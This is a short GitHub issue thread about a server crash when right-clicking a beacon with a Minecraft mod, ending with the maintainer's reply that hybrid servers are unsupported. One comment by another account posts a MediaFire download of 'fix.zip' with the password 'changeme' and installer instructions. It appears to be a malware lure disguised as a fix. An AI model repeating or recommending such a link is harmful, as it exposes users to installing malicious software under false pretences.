### ISSUE TITLE
beacon crash

### ISSUE THREAD

**Issue by naksha1** [henkelmax/status#25]
### Bug description

when i right click on beacon server crash

### Minecraft version

1.21

### Mod version

1.21 

### Mod loader and version

fabric 

### Steps to reproduce

1 right click on beacon 
2 some lag
3 server crash

### Log files

https://gist.github.com/naksha1/d3af331d4244cd822a3749560f35b312

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by henkelmax** [comment]
We don't support hybrid servers.
